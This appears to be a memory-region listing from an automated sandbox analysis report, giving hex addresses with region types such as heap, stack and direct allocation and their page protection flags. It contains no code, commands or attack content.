page read and write
36C0000
remote allocation
page read and write
1295C1DB000
heap
page read and write
1F0000
heap
page read and write
7810000
trusted library allocation
page read and write
33A4000
heap
page read and write
28CF000
stack
page read and write
8480000
trusted library allocation
page read and write
7734000
heap
page read and write
4260000
direct allocation
page execute and read and write
900000
heap
page read and write
7716000
heap
page read and write
2BE11F90000
trusted library section
page read and write
2FE4000
heap
page read and write
15D0000
heap
page read and write
106A000
unkown
page write copy
2CB5000
heap
page read and write
34D8000
heap
page read and write
4070000
direct allocation
page execute and read and write
5BB000
heap
page read and write
33A4000
heap
page read and write
3360000
heap
page read and write
7710000
trusted library allocation
page read and write
FF397F9000
stack
page read and write
FA2000
unkown
page readonly
FF381F7000
stack
page read and write
2FE4000
heap
page read and write
12DB000
heap
page read and write
34C3000
heap
page read and write
355D000
heap
page read and write
778A000
heap
page read and write
85E7000
direct allocation
page read and write
2BAB000
trusted library allocation
page read and write
44B2000
direct allocation
page read and write
4FF0000
trusted library allocation
page read and write
578E000
heap
page read and write
7734000
heap
page read and write
1B15000
heap
page read and write
34AC000
direct allocation
page read and write
2ABD000
heap
page read and write
33A4000
heap
page read and write
6C9D000
direct allocation
page read and write
37D0000
direct allocation
page execute and read and write
5180000
heap
page read and write
4ECF000
stack
page read and write
32C6000
heap
page read and write
12C4000
heap
page read and write
4150000
direct allocation
page execute and read and write
795000
heap
page read and write
3691000
heap
page read and write
33A4000
heap
page read and write
8FCE000
stack
page read and write
2BE1747D000
trusted library allocation
page read and write
2BE12E60000
trusted library section
page readonly
7721000
heap
page read and write
3289000
heap
page read and write
2CB1000
heap
page read and write
2FE8000
heap
page read and write
CD0000
heap
page read and write
3C60000
direct allocation
page execute and read and write
8CB6000
direct allocation
page read and write
2BE12089000
heap
page read and write
43A0000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
1067000
unkown
page write copy
2CB8000
heap
page read and write
2BE12902000
heap
page read and write
7C0000
heap
page read and write
2FE4000
heap
page read and write
2AB2000
heap
page read and write
2E80000
heap
page read and write
30F1000
heap
page read and write
44E6000
direct allocation
page read and write
3652000
heap
page read and write
283E000
stack
page read and write
4FF6000
trusted library allocation
page read and write
33A4000
heap
page read and write
145C000
heap
page read and write
2BE17430000
trusted library allocation
page read and write
35E0000
direct allocation
page execute and read and write
8EA0000
trusted library allocation
page read and write
2CAB000
heap
page read and write
8666000
direct allocation
page read and write
1AE3000
heap
page read and write
960000
heap
page read and write
1B2B000
heap
page read and write
5890000
heap
page execute and read and write
38E0000
direct allocation
page execute and read and write
1717000
heap
page read and write
3490000
heap
page read and write
35A0000
direct allocation
page execute and read and write
5620000
heap
page read and write
4ED000
stack
page read and write
4890000
heap
page read and write
900E000
stack
page read and write
8460000
trusted library allocation
page read and write
18B1000
heap
page read and write
310A000
heap
page read and write
2CAA000
heap
page read and write
2C3C000
stack
page read and write
1B21000
heap
page read and write
3489000
heap
page read and write
7717000
heap
page read and write
2C83000
heap
page read and write
2F18000
heap
page read and write
3030000
heap
page read and write
FF38AFB000
stack
page read and write
7DBC000
heap
page read and write
1710000
heap
page read and write
3930000
direct allocation
page execute and read and write
34A0000
heap
page read and write
32B5000
heap
page read and write
2FE4000
heap
page read and write
383E000
stack
page read and write
155A000
heap
page read and write
7721000
heap
page read and write
550000
heap
page read and write
5AE000
stack
page read and write
50F000
stack
page read and write
2FD4000
heap
page read and write
2FF1000
heap
page read and write
272C000
direct allocation
page read and write
7AC000
heap
page read and write
BCD000
stack
page read and write
1B04000
heap
page read and write
2FE4000
heap
page read and write
1B1A000
heap
page read and write
2FD4000
heap
page read and write
A47E000
stack
page read and write
106A000
unkown
page write copy
336E000
stack
page read and write
695E000
stack
page read and write
33A4000
heap
page read and write
D76000
heap
page read and write
3D70000
direct allocation
page execute and read and write
1B15000
heap
page read and write
33C0000
direct allocation
page read and write
FA2000
unkown
page readonly
1295C1C3000
heap
page read and write
500000
unkown
page execute read
8460000
trusted library allocation
page read and write
2FE4000
heap
page read and write
3C25000
heap
page read and write
7DC000
heap
page read and write
86D0000
direct allocation
page read and write
FA2000
unkown
page readonly
A10000
heap
page read and write
271D000
direct allocation
page read and write
1AEB000
heap
page read and write
33A4000
heap
page read and write
2CB1000
heap
page read and write
12BE98F0000
heap
page read and write
8460000
trusted library allocation
page read and write
7721000
heap
page read and write
A18000
heap
page read and write
8460000
trusted library allocation
page read and write
7FDBE000
direct allocation
page read and write
22DC000
direct allocation
page read and write
8FB000
heap
page read and write
7721000
heap
page read and write
940000
unkown
page readonly
3F70000
direct allocation
page execute and read and write
15FD000
stack
page read and write
FF38FFE000
unkown
page readonly
33A4000
heap
page read and write
23A0000
heap
page read and write
34E9000
direct allocation
page read and write
4CAD000
direct allocation
page read and write
5673000
heap
page read and write
FF396FE000
unkown
page readonly
766000
heap
page read and write
32F6000
heap
page read and write
2BE17500000
trusted library allocation
page read and write
5008000
trusted library allocation
page read and write
3200000
heap
page read and write
7B0000
heap
page read and write
337F000
stack
page read and write
31C0000
direct allocation
page read and write
3310000
heap
page read and write
348A000
heap
page read and write
33A4000
heap
page read and write
2F10000
heap
page read and write
8F7000
heap
page read and write
6C57000
direct allocation
page read and write
275E000
direct allocation
page read and write
2FE4000
heap
page read and write
3BB0000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
17E8000
heap
page read and write
1295C1A0000
heap
page read and write
8460000
trusted library allocation
page read and write
8B8E000
direct allocation
page read and write
12D5000
heap
page read and write
50D000
unkown
page read and write
2EED000
heap
page read and write
3294000
heap
page read and write
2BE12066000
heap
page read and write
3C80000
direct allocation
page execute and read and write
40A0000
direct allocation
page execute and read and write
42F0000
direct allocation
page execute and read and write
3643000
heap
page read and write
1B1A000
heap
page read and write
34AF000
heap
page read and write
8460000
trusted library allocation
page read and write
2BE17690000
heap
page read and write
348A000
heap
page read and write
1C58000
heap
page read and write
33A4000
heap
page read and write
33A4000
heap
page read and write
246D000
direct allocation
page read and write
7786000
heap
page read and write
3F80000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
3211000
heap
page read and write
1295C1EF000
heap
page read and write
8460000
trusted library allocation
page read and write
3580000
heap
page read and write
743000
heap
page read and write
1061000
unkown
page read and write
3890000
direct allocation
page execute and read and write
3338000
direct allocation
page read and write
3680000
heap
page read and write
8150000
trusted library allocation
page read and write
2310000
direct allocation
page execute and read and write
3420000
direct allocation
page execute and read and write
50EF000
stack
page read and write
2ABB000
stack
page read and write
3940000
direct allocation
page execute and read and write
7716000
heap
page read and write
33A4000
heap
page read and write
7735000
heap
page read and write
229F000
direct allocation
page read and write
7734000
heap
page read and write
910000
heap
page read and write
2D1E000
stack
page read and write
FF392FE000
unkown
page readonly
2AAE000
heap
page read and write
1798000
heap
page read and write
500C000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
F14000
trusted library allocation
page read and write
7FD32000
direct allocation
page read and write
2716000
direct allocation
page read and write
2EEA000
heap
page read and write
2F80000
trusted library allocation
page read and write
2BE12E90000
trusted library section
page readonly
3DD0000
direct allocation
page execute and read and write
34EC000
direct allocation
page read and write
1295C140000
heap
page read and write
11CE000
stack
page read and write
1B7F000
stack
page read and write
8460000
trusted library allocation
page read and write
13E0000
heap
page read and write
1295C1DB000
heap
page read and write
97000
stack
page read and write
77F1000
heap
page read and write
8ACC000
direct allocation
page read and write
57B3000
heap
page read and write
2FE4000
heap
page read and write
3B00000
direct allocation
page execute and read and write
3AA0000
direct allocation
page execute and read and write
3567000
heap
page read and write
2FE4000
heap
page read and write
3780000
direct allocation
page execute and read and write
648000
heap
page read and write
243B000
direct allocation
page read and write
1ABEB8F000
stack
page read and write
3D29000
trusted library allocation
page read and write
32F0000
heap
page read and write
1132000
trusted library allocation
page read and write
1A3F000
stack
page read and write
93CC000
stack
page read and write
6EF000
stack
page read and write
3414000
direct allocation
page execute and read and write
3565000
heap
page read and write
2E1A000
trusted library allocation
page read and write
3C16000
heap
page read and write
4FBF000
stack
page read and write
7FD10000
direct allocation
page read and write
2BE17640000
heap
page read and write
7710000
trusted library allocation
page read and write
7721000
heap
page read and write
9A60000
trusted library allocation
page read and write
33A4000
heap
page read and write
1066000
unkown
page read and write
23D1000
direct allocation
page read and write
3428000
direct allocation
page read and write
33A4000
heap
page read and write
3C27000
heap
page read and write
8850000
trusted library allocation
page read and write
7BB000
heap
page read and write
8460000
trusted library allocation
page read and write
2ABE000
heap
page read and write
3570000
direct allocation
page execute and read and write
3DF0000
direct allocation
page execute and read and write
12D1000
heap
page read and write
3790000
direct allocation
page execute and read and write
31AA000
heap
page read and write
2BE1205B000
heap
page read and write
3E80000
direct allocation
page execute and read and write
A57D000
stack
page read and write
3FC0000
direct allocation
page execute and read and write
7789000
heap
page read and write
1B15000
heap
page read and write
6500000
direct allocation
page read and write
2C7F000
heap
page read and write
12CB000
heap
page read and write
32C2000
direct allocation
page read and write
8480000
trusted library allocation
page read and write
66F0000
heap
page read and write
7810000
trusted library allocation
page read and write
4460000
direct allocation
page execute and read and write
E66000
heap
page read and write
2FE4000
heap
page read and write
3688000
heap
page read and write
321B000
heap
page read and write
2BE12000000
heap
page read and write
2FE4000
heap
page read and write
1B11000
heap
page read and write
DBE000
stack
page read and write
3C10000
heap
page read and write
2DDC000
stack
page read and write
2DAE000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
F9E000
unkown
page read and write
1B1B000
heap
page read and write
3F40000
direct allocation
page execute and read and write
1C6B000
heap
page read and write
8150000
trusted library allocation
page read and write
32D0000
heap
page read and write
33B8000
heap
page read and write
5313000
heap
page read and write
2FE0000
heap
page read and write
33A4000
heap
page read and write
506000
unkown
page read and write
65BD000
direct allocation
page read and write
4470000
direct allocation
page execute and read and write
BBF000
stack
page read and write
1AFE000
heap
page read and write
1F3AE590000
heap
page read and write
4FD0000
unclassified section
page read and write
8A9D000
direct allocation
page read and write
33A4000
heap
page read and write
2CB5000
heap
page read and write
2F1C000
heap
page read and write
33A4000
heap
page read and write
2F06000
heap
page read and write
1295C1DC000
heap
page read and write
7F7000
heap
page read and write
3C25000
heap
page read and write
3720000
direct allocation
page execute and read and write
2DE0000
trusted library allocation
page read and write
2FE4000
heap
page read and write
8613000
direct allocation
page read and write
33A4000
heap
page read and write
2FD4000
heap
page read and write
3670000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
503F000
stack
page read and write
23EB000
direct allocation
page read and write
52E0000
trusted library section
page readonly
33A4000
heap
page read and write
3468000
heap
page read and write
8643000
direct allocation
page read and write
61E9E000
unkown
page write copy
4100000
direct allocation
page execute and read and write
2CC0000
heap
page read and write
33A4000
heap
page read and write
3A10000
direct allocation
page execute and read and write
2F6D000
stack
page read and write
7FDE0000
direct allocation
page read and write
7B7000
heap
page read and write
5A9F000
stack
page read and write
1AD0000
heap
page read and write
7D84000
heap
page read and write
500A000
trusted library allocation
page read and write
2C7C000
heap
page read and write
2FF1000
heap
page read and write
51C0000
heap
page read and write
3220000
heap
page read and write
D40000
heap
page read and write
752000
heap
page read and write
36B0000
direct allocation
page read and write
16F0000
direct allocation
page read and write
1295C1BE000
heap
page read and write
1B1B000
heap
page read and write
8460000
trusted library allocation
page read and write
FF3937E000
stack
page read and write
1ACE000
stack
page read and write
2E18000
trusted library allocation
page read and write
43C0000
direct allocation
page execute and read and write
77F1000
heap
page read and write
2708000
direct allocation
page read and write
33C8000
direct allocation
page read and write
30F0000
heap
page read and write
C9F000
stack
page read and write
12D1000
heap
page read and write
3740000
direct allocation
page execute and read and write
2440000
direct allocation
page read and write
42C0000
direct allocation
page execute and read and write
988C000
stack
page read and write
3C16000
heap
page read and write
15D000
stack
page read and write
2FD4000
heap
page read and write
8460000
trusted library allocation
page read and write
12BE99F0000
heap
page read and write
D10000
unkown
page readonly
349A000
heap
page read and write
7B80000
heap
page read and write
8460000
trusted library allocation
page read and write
12CA000
heap
page read and write
9FD000
stack
page read and write
7721000
heap
page read and write
2F1D000
stack
page read and write
3C70000
direct allocation
page execute and read and write
12DB000
heap
page read and write
7810000
trusted library allocation
page read and write
393F000
stack
page read and write
2CBB000
heap
page read and write
8460000
trusted library allocation
page read and write
8490000
trusted library allocation
page read and write
34A2000
heap
page read and write
3760000
heap
page read and write
32F3000
direct allocation
page read and write
1295C206000
heap
page read and write
8590000
direct allocation
page read and write
7CA000
heap
page read and write
3860000
direct allocation
page execute and read and write
7784000
heap
page read and write
779000
heap
page read and write
4190000
direct allocation
page execute and read and write
40E0000
direct allocation
page execute and read and write
7789000
heap
page read and write
4F30000
heap
page read and write
36D4000
direct allocation
page read and write
34AC000
direct allocation
page read and write
8ABE000
direct allocation
page read and write
1B0A000
heap
page read and write
4A0000
heap
page read and write
112E000
stack
page read and write
880C000
direct allocation
page read and write
866C000
direct allocation
page read and write
1295C21F000
heap
page read and write
6C28000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
41F0000
direct allocation
page execute and read and write
129F000
heap
page read and write
F65000
heap
page read and write
8460000
trusted library allocation
page read and write
8E4D000
stack
page read and write
1295C1B4000
heap
page read and write
4030000
direct allocation
page execute and read and write
9E3831C000
stack
page read and write
2BE12E70000
trusted library section
page readonly
7ABC000
heap
page read and write
31FF000
heap
page read and write
187E000
heap
page read and write
502000
unkown
page read and write
D0F000
stack
page read and write
1B15000
heap
page read and write
6C06000
direct allocation
page read and write
35E0000
trusted library allocation
page read and write
2FE5000
heap
page read and write
2D1B000
stack
page read and write
2FD4000
heap
page read and write
8460000
trusted library allocation
page read and write
8695000
direct allocation
page read and write
1B28000
heap
page read and write
300F000
stack
page read and write
1295C1A8000
heap
page read and write
7FE20000
direct allocation
page read and write
1ADF000
heap
page read and write
8460000
trusted library allocation
page read and write
3620000
direct allocation
page execute and read and write
7726000
heap
page read and write
84F0000
trusted library allocation
page read and write
7FD1C000
direct allocation
page read and write
2BE17460000
trusted library allocation
page read and write
3491000
heap
page read and write
24E0000
heap
page read and write
2BE17450000
trusted library allocation
page read and write
3C50000
direct allocation
page execute and read and write
D11000
unkown
page execute read
4FF0000
trusted library allocation
page read and write
273A000
direct allocation
page read and write
2F1A000
heap
page read and write
1FF662F0000
heap
page read and write
3C1E000
heap
page read and write
33A4000
heap
page read and write
457B000
direct allocation
page read and write
2E23000
trusted library allocation
page read and write
319E000
heap
page read and write
34A5000
heap
page read and write
D10000
unkown
page readonly
778B000
heap
page read and write
D10000
unkown
page readonly
11B0000
heap
page read and write
1C5C000
heap
page read and write
3368000
heap
page read and write
3D00000
direct allocation
page execute and read and write
1B11000
heap
page read and write
1B0A000
heap
page read and write
681E000
stack
page read and write
2FA0000
heap
page read and write
778B000
heap
page read and write
33A4000
heap
page read and write
3AF0000
direct allocation
page execute and read and write
D11000
unkown
page execute read
2FE4000
heap
page read and write
2750000
direct allocation
page read and write
643F000
stack
page read and write
C08000
heap
page read and write
1558000
heap
page read and write
7810000
trusted library allocation
page read and write
68B0000
trusted library allocation
page read and write
F9E000
unkown
page read and write
3646000
heap
page read and write
12D1000
heap
page read and write
21C8000
direct allocation
page read and write
7A9000
heap
page read and write
2ACB000
heap
page read and write
79B000
heap
page read and write
87DC000
direct allocation
page read and write
417000
unkown
page read and write
450A000
direct allocation
page read and write
33A4000
heap
page read and write
2EC0000
remote allocation
page read and write
8A5D000
stack
page read and write
223D000
direct allocation
page read and write
7FD81000
direct allocation
page read and write
3C10000
direct allocation
page execute and read and write
3657000
heap
page read and write
8672000
direct allocation
page read and write
30D0000
heap
page read and write
2BE17620000
heap
page read and write
2CAA000
heap
page read and write
341E000
stack
page read and write
735000
heap
page read and write
1484000
unkown
page execute and read and write
77F1000
heap
page read and write
2ED9000
heap
page read and write
401000
unkown
page execute read
3360000
heap
page read and write
797000
heap
page read and write
F23000
trusted library allocation
page read and write
2BE174C1000
trusted library allocation
page read and write
2FE4000
heap
page read and write
1895000
heap
page read and write
8460000
trusted library allocation
page read and write
1295C1C0000
heap
page read and write
51D0000
trusted library allocation
page read and write
33A4000
heap
page read and write
1F0000
heap
page read and write
2FA8000
heap
page read and write
2B8C000
stack
page read and write
FF38BFE000
unkown
page readonly
5E6000
unkown
page readonly
34AB000
heap
page read and write
7FD90000
direct allocation
page read and write
71F000
stack
page read and write
3450000
heap
page read and write
364F000
stack
page read and write
2FE4000
heap
page read and write
7EB000
heap
page read and write
2CB5000
heap
page read and write
2A98000
heap
page read and write
2F19000
heap
page read and write
869000
unkown
page execute and write copy
2ACB000
heap
page read and write
23B7000
direct allocation
page read and write
113A000
trusted library allocation
page execute and read and write
3B20000
direct allocation
page execute and read and write
33A4000
heap
page read and write
1295C1B6000
heap
page read and write
106B000
unkown
page readonly
34A4000
heap
page read and write
3400000
heap
page read and write
552F000
stack
page read and write
7725000
heap
page read and write
4FF6000
trusted library allocation
page read and write
33A4000
heap
page read and write
3211000
heap
page read and write
106A000
unkown
page write copy
1295C160000
remote allocation
page read and write
9E8000
stack
page read and write
BE0000
heap
page read and write
84E0000
trusted library allocation
page read and write
2BE17580000
trusted library allocation
page read and write
8AC7000
direct allocation
page read and write
3290000
heap
page read and write
7810000
trusted library allocation
page read and write
3DC0000
direct allocation
page execute and read and write
8808000
direct allocation
page read and write
33A4000
heap
page read and write
590000
heap
page read and write
31C0000
direct allocation
page read and write
1066000
unkown
page write copy
2FD4000
heap
page read and write
1295C1BD000
heap
page read and write
33A4000
heap
page read and write
9DE000
stack
page read and write
778B000
heap
page read and write
7B1000
heap
page read and write
1295C1DC000
heap
page read and write
FF3947E000
stack
page read and write
697000
heap
page read and write
33ED000
stack
page read and write
7717000
heap
page read and write
94CD000
stack
page read and write
84D0000
trusted library allocation
page read and write
34A6000
heap
page read and write
8480000
trusted library allocation
page read and write
3470000
heap
page read and write
1FF663F0000
heap
page read and write
633E000
stack
page read and write
7C7000
heap
page read and write
348D000
heap
page read and write
3550000
heap
page read and write
881000
unkown
page execute and read and write
2BE12129000
heap
page read and write
3556000
heap
page read and write
23BF000
direct allocation
page read and write
2BE120B0000
heap
page read and write
3E20000
direct allocation
page execute and read and write
D50000
heap
page read and write
325C000
stack
page read and write
31D0000
direct allocation
page execute and read and write
76D000
heap
page read and write
106A000
unkown
page write copy
1B1A000
heap
page read and write
2FD4000
heap
page read and write
8460000
trusted library allocation
page read and write
3080000
heap
page read and write
2FE4000
heap
page read and write
2FD4000
heap
page read and write
33A4000
heap
page read and write
7D1000
heap
page read and write
22F1000
direct allocation
page read and write
2FD4000
heap
page read and write
7A9000
heap
page read and write
2FE4000
heap
page read and write
8460000
trusted library allocation
page read and write
3820000
direct allocation
page execute and read and write
2BE174EA000
trusted library allocation
page read and write
C60000
heap
page read and write
4CA0000
direct allocation
page read and write
7734000
heap
page read and write
7FD0E000
direct allocation
page read and write
2BE1209D000
heap
page read and write
2401000
direct allocation
page read and write
2FE4000
heap
page read and write
7725000
heap
page read and write
8460000
trusted library allocation
page read and write
30CF000
stack
page read and write
4350000
direct allocation
page execute and read and write
2FD4000
heap
page read and write
1140000
trusted library allocation
page read and write
3340000
direct allocation
page execute and read and write
8B73000
direct allocation
page read and write
3990000
direct allocation
page execute and read and write
7FE10000
direct allocation
page read and write
2BE12815000
heap
page read and write
7725000
heap
page read and write
3471000
direct allocation
page read and write
2FD4000
heap
page read and write
FA2000
unkown
page readonly
2FC7000
heap
page read and write
5008000
trusted library allocation
page read and write
106A000
unkown
page write copy
7FD6D000
direct allocation
page read and write
2483000
direct allocation
page read and write
780000
heap
page read and write
2BE133A0000
trusted library allocation
page read and write
85BD000
direct allocation
page read and write
2CBB000
heap
page read and write
1C69000
heap
page read and write
32B5000
heap
page read and write
66B1000
heap
page read and write
8460000
trusted library allocation
page read and write
5640000
trusted library allocation
page read and write
3691000
heap
page read and write
32C9000
heap
page read and write
321B000
heap
page read and write
7A6000
heap
page read and write
5570000
heap
page read and write
8460000
trusted library allocation
page read and write
33A4000
heap
page read and write
778A000
heap
page read and write
D10000
unkown
page readonly
958D000
stack
page read and write
32CE000
stack
page read and write
9E0000
heap
page read and write
84F0000
trusted library allocation
page read and write
FF391FA000
stack
page read and write
4580000
direct allocation
page read and write
2A3F000
stack
page read and write
8150000
trusted library allocation
page read and write
7B4000
heap
page read and write
4370000
direct allocation
page execute and read and write
9E3839E000
stack
page read and write
3D21000
trusted library allocation
page read and write
2BE1743E000
trusted library allocation
page read and write
2D40000
heap
page read and write
3E30000
direct allocation
page execute and read and write
3C19000
heap
page read and write
2BE176D4000
heap
page read and write
2498000
direct allocation
page read and write
2FE4000
heap
page read and write
32C8000
heap
page read and write
4FDE000
stack
page read and write
3630000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
F3B000
heap
page read and write
FF39EFE000
unkown
page readonly
7B2A000
heap
page read and write
19B000
stack
page read and write
1B10000
heap
page read and write
3211000
heap
page read and write
1ADC000
heap
page read and write
8150000
trusted library allocation
page read and write
4160000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
500A000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
8B98000
direct allocation
page read and write
33CA000
heap
page read and write
8460000
trusted library allocation
page read and write
35E0000
trusted library allocation
page read and write
8C0000
heap
page read and write
7785000
heap
page read and write
7FD49000
direct allocation
page read and write
549D000
heap
page read and write
FF39E7E000
stack
page read and write
8460000
trusted library allocation
page read and write
9CA000
heap
page read and write
2FE4000
heap
page read and write
2C7B000
heap
page read and write
8460000
trusted library allocation
page read and write
2F70000
heap
page read and write
2EFC000
stack
page read and write
34F0000
heap
page read and write
2BE12102000
heap
page read and write
2EE0000
heap
page read and write
2BE17486000
trusted library allocation
page read and write
2AAE000
heap
page read and write
778A000
heap
page read and write
2A90000
heap
page read and write
2EC0000
remote allocation
page read and write
3C21000
heap
page read and write
33A4000
heap
page read and write
2BE17590000
trusted library allocation
page read and write
1B31000
heap
page read and write
2FE4000
heap
page read and write
312F000
stack
page read and write
3C1D000
heap
page read and write
3C1D000
heap
page read and write
12D5000
heap
page read and write
158000
stack
page read and write
288E000
stack
page read and write
401000
unkown
page execute and write copy
33C0000
heap
page read and write
4AD000
stack
page read and write
12D1000
heap
page read and write
F9E000
unkown
page write copy
66E8000
heap
page read and write
3A00000
direct allocation
page execute and read and write
5B0000
heap
page read and write
3460000
heap
page read and write
32C3000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
33A4000
heap
page read and write
33A4000
heap
page read and write
2FE4000
heap
page read and write
12E1000
heap
page read and write
3800000
direct allocation
page execute and read and write
36CD000
direct allocation
page read and write
2BD0000
heap
page read and write
321B000
heap
page read and write
4200000
direct allocation
page execute and read and write
349D000
heap
page read and write
3690000
direct allocation
page execute and read and write
4623000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
2CB7000
heap
page read and write
34AD000
heap
page read and write
D11000
unkown
page execute read
33B0000
heap
page read and write
A83D000
stack
page read and write
2BE17702000
heap
page read and write
778B000
heap
page read and write
2BA0000
trusted library allocation
page read and write
2FE4000
heap
page read and write
2FE0000
heap
page read and write
128D000
stack
page read and write
33A0000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
7810000
trusted library allocation
page read and write
3A80000
direct allocation
page execute and read and write
6CB3000
direct allocation
page read and write
1B11000
heap
page read and write
861E000
direct allocation
page read and write
538000
unkown
page readonly
1B21000
heap
page read and write
8590000
trusted library allocation
page read and write
33A4000
heap
page read and write
1066000
unkown
page write copy
35C0000
direct allocation
page execute and read and write
A5FE000
stack
page read and write
8460000
trusted library allocation
page read and write
3DE0000
direct allocation
page execute and read and write
1AFE000
heap
page read and write
34D0000
heap
page read and write
775000
heap
page read and write
2BE17560000
trusted library allocation
page read and write
2FD4000
heap
page read and write
2FE4000
heap
page read and write
2474000
direct allocation
page read and write
2BE17655000
heap
page read and write
4F90000
heap
page read and write
2CB1000
heap
page read and write
2BCD000
trusted library allocation
page read and write
2FE4000
heap
page read and write
2FE4000
heap
page read and write
31B0000
direct allocation
page read and write
2BE17663000
heap
page read and write
1B11000
heap
page read and write
1B2C000
heap
page read and write
36B0000
direct allocation
page execute and read and write
55EE000
stack
page read and write
7810000
trusted library allocation
page read and write
2CB5000
heap
page read and write
8460000
trusted library allocation
page read and write
1AFE000
heap
page read and write
1B0A000
heap
page read and write
306E000
stack
page read and write
3C1A000
heap
page read and write
2FE4000
heap
page read and write
7AB0000
heap
page read and write
12EE000
stack
page read and write
31CF000
stack
page read and write
3495000
direct allocation
page read and write
3C25000
heap
page read and write
3497000
heap
page read and write
345B000
direct allocation
page read and write
4556000
direct allocation
page read and write
2DFF000
stack
page read and write
33A4000
heap
page read and write
8460000
trusted library allocation
page read and write
32E1000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
16F0000
direct allocation
page read and write
33A4000
heap
page read and write
F30000
heap
page read and write
7717000
heap
page read and write
77F1000
heap
page read and write
1AF3000
heap
page read and write
1B15000
heap
page read and write
34D6000
direct allocation
page read and write
2BE12113000
heap
page read and write
2BE12E40000
trusted library section
page readonly
890000
unkown
page execute and write copy
1458000
heap
page read and write
2BE12E50000
trusted library section
page readonly
5AEE000
stack
page read and write
8AA3000
direct allocation
page read and write
7611000
heap
page read and write
1910000
heap
page read and write
343F000
direct allocation
page read and write
7CE000
heap
page read and write
8460000
trusted library allocation
page read and write
2291000
direct allocation
page read and write
3E10000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
2FE0000
heap
page read and write
1C50000
heap
page read and write
2BE17500000
trusted library allocation
page read and write
3910000
direct allocation
page execute and read and write
400000
unkown
page readonly
3320000
direct allocation
page read and write
4F40000
heap
page read and write
66E6000
heap
page read and write
7FDDB000
direct allocation
page read and write
2E06000
trusted library allocation
page read and write
33A4000
heap
page read and write
1717000
heap
page read and write
4120000
direct allocation
page execute and read and write
2757000
direct allocation
page read and write
2B3C000
stack
page read and write
640000
heap
page read and write
50D000
unkown
page write copy
6BB0000
direct allocation
page read and write
7721000
heap
page read and write
30E6000
heap
page read and write
12D5000
heap
page read and write
106B000
unkown
page readonly
2840000
heap
page read and write
8460000
trusted library allocation
page read and write
D10000
unkown
page readonly
8FD000
stack
page read and write
37C0000
direct allocation
page execute and read and write
2EEA000
heap
page read and write
44A0000
direct allocation
page read and write
1717000
heap
page read and write
3D90000
direct allocation
page execute and read and write
188C000
heap
page read and write
8B90000
direct allocation
page read and write
7A0000
heap
page read and write
998D000
stack
page read and write
3090000
heap
page read and write
2BE12F80000
trusted library allocation
page read and write
86A9000
direct allocation
page read and write
2F2D000
stack
page read and write
5EA000
unkown
page readonly
732000
heap
page read and write
33B0000
heap
page read and write
7BB000
heap
page read and write
2FE4000
heap
page read and write
670000
heap
page read and write
2BE1749C000
trusted library allocation
page read and write
8E4000
unkown
page execute and write copy
1AFE000
heap
page read and write
31AA000
heap
page read and write
1B11000
heap
page read and write
33A4000
heap
page read and write
86EC000
direct allocation
page read and write
1555000
heap
page read and write
7717000
heap
page read and write
2FD4000
heap
page read and write
5014000
trusted library allocation
page read and write
12DC000
heap
page read and write
D11000
unkown
page execute read
2FE4000
heap
page read and write
2BC6000
trusted library allocation
page read and write
2BE120B4000
heap
page read and write
33F0000
heap
page read and write
7721000
heap
page read and write
3CE0000
direct allocation
page execute and read and write
3472000
heap
page read and write
12DB000
heap
page read and write
75E000
stack
page read and write
6640000
direct allocation
page execute and read and write
2BF0000
heap
page read and write
3170000
heap
page read and write
8B64000
direct allocation
page read and write
34C3000
heap
page read and write
33A4000
heap
page read and write
2C00000
trusted library allocation
page read and write
870C000
direct allocation
page read and write
3498000
heap
page read and write
8639000
direct allocation
page read and write
77F1000
heap
page read and write
2E29000
trusted library allocation
page read and write
39D0000
direct allocation
page execute and read and write
7B6000
heap
page read and write
175000
stack
page read and write
305F000
stack
page read and write
761000
heap
page read and write
7B5000
heap
page read and write
18CF000
stack
page read and write
348B000
heap
page read and write
D1F000
stack
page read and write
4080000
direct allocation
page execute and read and write
4280000
direct allocation
page execute and read and write
23B0000
heap
page read and write
83F000
stack
page read and write
2FC0000
heap
page read and write
33A4000
heap
page read and write
4541000
direct allocation
page read and write
4310000
direct allocation
page execute and read and write
2FEB000
stack
page read and write
8520000
trusted library allocation
page read and write
2FD0000
heap
page read and write
CF0000
heap
page read and write
8CCD000
direct allocation
page read and write
7DC000
heap
page read and write
33E0000
direct allocation
page execute and read and write
2970000
heap
page read and write
7784000
heap
page read and write
2FD4000
heap
page read and write
12DB000
heap
page read and write
34D0000
direct allocation
page read and write
778A000
heap
page read and write
33A4000
heap
page read and write
2BE1291A000
heap
page read and write
12E0000
heap
page read and write
333E000
stack
page read and write
3411000
direct allocation
page read and write
52F0000
trusted library allocation
page execute and read and write
2BE17713000
heap
page read and write
86BE000
direct allocation
page read and write
1B1C000
heap
page read and write
7810000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
3650000
heap
page read and write
18F2000
heap
page read and write
5780000
heap
page read and write
1AE9000
heap
page read and write
3C1F000
heap
page read and write
2BE17510000
trusted library allocation
page read and write
4F2E000
stack
page read and write
106B000
unkown
page readonly
38F0000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
2CC1000
heap
page read and write
400000
unkown
page readonly
12D5000
heap
page read and write
BD0000
heap
page read and write
11D0000
heap
page read and write
2FE4000
heap
page read and write
30FB000
stack
page read and write
6B1C000
stack
page read and write
7D10000
trusted library allocation
page read and write
3471000
heap
page read and write
3CC0000
direct allocation
page execute and read and write
1290000
heap
page read and write
36C6000
direct allocation
page read and write
35B0000
direct allocation
page execute and read and write
D10000
unkown
page readonly
1B1A000
heap
page read and write
106B000
unkown
page readonly
3380000
direct allocation
page execute and read and write
2C05000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
2FD4000
heap
page read and write
3480000
heap
page read and write
4FF6000
trusted library allocation
page read and write
1450000
heap
page read and write
B80000
heap
